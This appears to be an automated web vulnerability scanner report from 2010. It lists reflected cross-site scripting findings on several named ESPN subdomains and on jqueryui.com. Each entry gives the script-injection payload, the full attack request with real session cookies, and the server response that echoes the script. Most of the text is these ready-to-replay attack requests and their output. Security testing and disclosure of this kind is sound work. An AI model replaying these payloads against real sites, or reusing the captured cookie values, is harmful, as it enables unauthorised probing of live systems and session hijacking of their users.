s_pers=%20s_c24%3D1289009690492%7C1383617690492%3B%20s_c24_s%3DFirst%2520Visit%7C1289011490492%3B%20s_gpv_pn%3Dfantasy%253Apoker%253Apokerpickem%253Afrontpage%7C1289011490524%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: maxage=0 Connection: close Content-Length: 17807 Content-Type: text/html; charset=iso-8859-1 Pragma: no-cache X-UA-Compatible: IE=EmulateIE7 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<head> <script type="text/javascript" lang ...[SNIP]... <h2>/pokerpickem/en/endd1f8<script>alert(1)</script>3870a2a6f26/frontpage</h2> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload cad91<script>alert(1)</script>aea9d8a4290 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pokerpickem/en/frontpagecad91<script>alert(1)</script>aea9d8a4290 HTTP/1.1 Host: games.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A11%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Ftravel%2Fstadium%2FstadiumIndex%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A13%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009690554; s_sess=%20s_ppv%3D99%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289009651247; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009690492%7C1383617690492%3B%20s_c24_s%3DFirst%2520Visit%7C1289011490492%3B%20s_gpv_pn%3Dfantasy%253Apoker%253Apokerpickem%253Afrontpage%7C1289011490524%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response
HTTP/1.1 200 OK Cache-Control: maxage=0 Connection: close Content-Length: 17804 Content-Type: text/html; charset=iso-8859-1 Pragma: no-cache X-UA-Compatible: IE=EmulateIE7 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<head> <script type="text/javascript" lang ...[SNIP]... <h2>/pokerpickem/en/frontpagecad91<script>alert(1)</script>aea9d8a4290</h2> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a748f<script>alert(1)</script>f8c10452a72 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /pokerpickem/ena748f<script>alert(1)</script>f8c10452a72/group HTTP/1.1 Host: games.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A11%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Ftravel%2Fstadium%2FstadiumIndex%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A13%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009690554; s_sess=%20s_ppv%3D99%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289009651247; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009690492%7C1383617690492%3B%20s_c24_s%3DFirst%2520Visit%7C1289011490492%3B%20s_gpv_pn%3Dfantasy%253Apoker%253Apokerpickem%253Afrontpage%7C1289011490524%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: maxage=0 Connection: close Content-Length: 17803 Content-Type: text/html; charset=iso-8859-1 Pragma: no-cache X-UA-Compatible: IE=EmulateIE7 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<head> <script type="text/javascript" lang ...[SNIP]... <h2>/pokerpickem/en/ena748f<script>alert(1)</script>f8c10452a72/group</h2> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload d225d<script>alert(1)</script>ba2a1fa4d8d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pokerpickem/en/groupd225d<script>alert(1)</script>ba2a1fa4d8d HTTP/1.1 Host: games.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A11%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Ftravel%2Fstadium%2FstadiumIndex%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A13%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009690554; s_sess=%20s_ppv%3D99%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289009651247; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009690492%7C1383617690492%3B%20s_c24_s%3DFirst%2520Visit%7C1289011490492%3B%20s_gpv_pn%3Dfantasy%253Apoker%253Apokerpickem%253Afrontpage%7C1289011490524%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response
HTTP/1.1 200 OK Cache-Control: maxage=0 Connection: close Content-Length: 17800 Content-Type: text/html; charset=iso-8859-1 Pragma: no-cache X-UA-Compatible: IE=EmulateIE7 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<head> <script type="text/javascript" lang ...[SNIP]... <h2>/pokerpickem/en/groupd225d<script>alert(1)</script>ba2a1fa4d8d</h2> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 60154<script>alert(1)</script>a8449528d68 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /pokerpickem/en60154<script>alert(1)</script>a8449528d68/story HTTP/1.1 Host: games.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A11%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Ftravel%2Fstadium%2FstadiumIndex%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A13%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009690554; s_sess=%20s_ppv%3D99%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289009651247; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009690492%7C1383617690492%3B%20s_c24_s%3DFirst%2520Visit%7C1289011490492%3B%20s_gpv_pn%3Dfantasy%253Apoker%253Apokerpickem%253Afrontpage%7C1289011490524%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: maxage=0 Connection: close Content-Length: 17803 Content-Type: text/html; charset=iso-8859-1 Pragma: no-cache X-UA-Compatible: IE=EmulateIE7 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<head> <script type="text/javascript" lang ...[SNIP]... <h2>/pokerpickem/en/en60154<script>alert(1)</script>a8449528d68/story</h2> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 98bbc<script>alert(1)</script>d41001c2763 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pokerpickem/en/story98bbc<script>alert(1)</script>d41001c2763 HTTP/1.1 Host: games.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A11%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Ftravel%2Fstadium%2FstadiumIndex%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A13%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009690554; s_sess=%20s_ppv%3D99%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289009651247; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009690492%7C1383617690492%3B%20s_c24_s%3DFirst%2520Visit%7C1289011490492%3B%20s_gpv_pn%3Dfantasy%253Apoker%253Apokerpickem%253Afrontpage%7C1289011490524%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response
HTTP/1.1 200 OK Cache-Control: maxage=0 Connection: close Content-Length: 17800 Content-Type: text/html; charset=iso-8859-1 Pragma: no-cache X-UA-Compatible: IE=EmulateIE7 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<head> <script type="text/javascript" lang ...[SNIP]... <h2>/pokerpickem/en/story98bbc<script>alert(1)</script>d41001c2763</h2> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1a591<script>alert(1)</script>4469738f57 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /insider/blog1a591<script>alert(1)</script>4469738f57 HTTP/1.1 Host: insider.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Connection: close Content-Length: 133 Content-Type: text/html; charset=iso-8859-1 Server: barista/3.3.6 Via: 8810-05/06
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/insider/blog1a591<script>alert(1)</script>4469738f57</BODY></HTML>
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f2f55<script>alert(1)</script>52656a339f6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /insider/indexf2f55<script>alert(1)</script>52656a339f6 HTTP/1.1 Host: insider.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Connection: close Content-Length: 135 Content-Type: text/html; charset=iso-8859-1 Server: barista/3.3.6 Via: 8810-05/06
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/insider/indexf2f55<script>alert(1)</script>52656a339f6</BODY></HTML>
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d0146<script>alert(1)</script>35faeff8fe6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /insider/newsd0146<script>alert(1)</script>35faeff8fe6 HTTP/1.1 Host: insider.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Connection: close Content-Length: 134 Content-Type: text/html; charset=iso-8859-1 Server: barista/3.3.6 Via: 8810-05/06
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/insider/newsd0146<script>alert(1)</script>35faeff8fe6</BODY></HTML>
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 941a2<script>alert(1)</script>9a411c627fc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /insider/rumorcentral941a2<script>alert(1)</script>9a411c627fc HTTP/1.1 Host: insider.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Connection: close Content-Length: 142 Content-Type: text/html; charset=iso-8859-1 Server: barista/3.3.6 Via: 8810-05/06
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/insider/rumorcentral941a2<script>alert(1)</script>9a411c627fc</BODY></HTML>
5.45. http://insider.espn.go.com/insider/rumorcentral [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://insider.espn.go.com
Path:
/insider/rumorcentral
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eba35"><script>alert(1)</script>2279e161389 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /insider/rumorcentral?eba35"><script>alert(1)</script>2279e161389=1 HTTP/1.1 Host: insider.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload dfccc<script>alert(1)</script>5419d7c4d6a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /insider/sportindexdfccc<script>alert(1)</script>5419d7c4d6a HTTP/1.1 Host: insider.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Connection: close Content-Length: 140 Content-Type: text/html; charset=iso-8859-1 Server: barista/3.3.6 Via: 8810-05/06
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/insider/sportindexdfccc<script>alert(1)</script>5419d7c4d6a</BODY></HTML>
5.47. http://jqueryui.com/themeroller/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://jqueryui.com
Path:
/themeroller/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bddcf"><script>alert(1)</script>fc15db9fdd9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?bddcf"><script>alert(1)</script>fc15db9fdd9=1 HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 07 Nov 2010 00:35:21 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 117121
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3b753<script>alert(1)</script>9c552fecda5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /soccer3b753<script>alert(1)</script>9c552fecda5/ HTTP/1.1 Host: m.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Connection: close Content-Length: 129 Content-Type: text/html; charset=iso-8859-1 Server: barista/3.3.6
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/soccer3b753<script>alert(1)</script>9c552fecda5/</BODY></HTML>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 57344<script>alert(1)</script>4ba2aaa9554 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wireless57344<script>alert(1)</script>4ba2aaa9554/ HTTP/1.1 Host: m.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Connection: close Content-Length: 131 Content-Type: text/html; charset=iso-8859-1 Server: barista/3.3.6
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/wireless57344<script>alert(1)</script>4ba2aaa9554/</BODY></HTML>
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 58f10<script>alert(1)</script>c39bdb4f674 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /outdoors/bassmaster/members58f10<script>alert(1)</script>c39bdb4f674/insider/resources/column HTTP/1.1 Host: proxy.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A10%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2Fcollege-football%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A12%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; s_sess=%20s_v3%3D2010_nbati_xxx_xxx_xxx_xxx%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B%20s_ppv%3D94%3B; CRBLM_LAST_UPDATE=1289009493; ESPN360beta=betaSet; userAB=7; lang=en; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009663777%7C1383617663777%3B%20s_c24_s%3DFirst%2520Visit%7C1289011463777%3B%20s_gpv_pn%3Despn%253Ancf%253Aindex%7C1289011463789%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response
HTTP/1.1 404 Not Found Connection: close Content-Length: 174 Content-Type: text/html; charset=iso-8859-1 Server: barista/3.3.6 P3P: CAO DSP CURi ADM DEV TAIi PSA PSD IVAi IVDi CONi OUR DELi SAMi BUS PHY ONL UNI COM NAV DEM CNT STA PRE Pool: pool-ESPN_proxy_bassmaster Via: 8810-09/10
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/outdoors/bassmaster/members58f10<script>alert(1)</script>c39bdb4f674/insider/resources/column</BODY></HTML>
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 633a0<script>alert(1)</script>c2ca6d34533 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /outdoors/bassmaster/members633a0<script>alert(1)</script>c2ca6d34533/insider/story HTTP/1.1 Host: proxy.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A10%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2Fcollege-football%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A12%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; s_sess=%20s_v3%3D2010_nbati_xxx_xxx_xxx_xxx%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B%20s_ppv%3D94%3B; CRBLM_LAST_UPDATE=1289009493; ESPN360beta=betaSet; userAB=7; lang=en; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009663777%7C1383617663777%3B%20s_c24_s%3DFirst%2520Visit%7C1289011463777%3B%20s_gpv_pn%3Despn%253Ancf%253Aindex%7C1289011463789%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response
HTTP/1.1 404 Not Found Connection: close Content-Length: 163 Content-Type: text/html; charset=iso-8859-1 Server: barista/3.3.6 P3P: CAO DSP CURi ADM DEV TAIi PSA PSD IVAi IVDi CONi OUR DELi SAMi BUS PHY ONL UNI COM NAV DEM CNT STA PRE Pool: pool-ESPN_proxy_bassmaster Via: 8810-09/10
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/outdoors/bassmaster/members633a0<script>alert(1)</script>c2ca6d34533/insider/story</BODY></HTML>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e04cf<script>alert(1)</script>68bc7ba9f82 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sendtofriende04cf<script>alert(1)</script>68bc7ba9f82/SendToFriend HTTP/1.1 Host: sendtofriend.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Connection: close Content-Length: 147 Content-Type: text/html; charset=iso-8859-1 Server: barista/3.3.6 Via: 8810-03/04
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/sendtofriende04cf<script>alert(1)</script>68bc7ba9f82/SendToFriend</BODY></HTML>
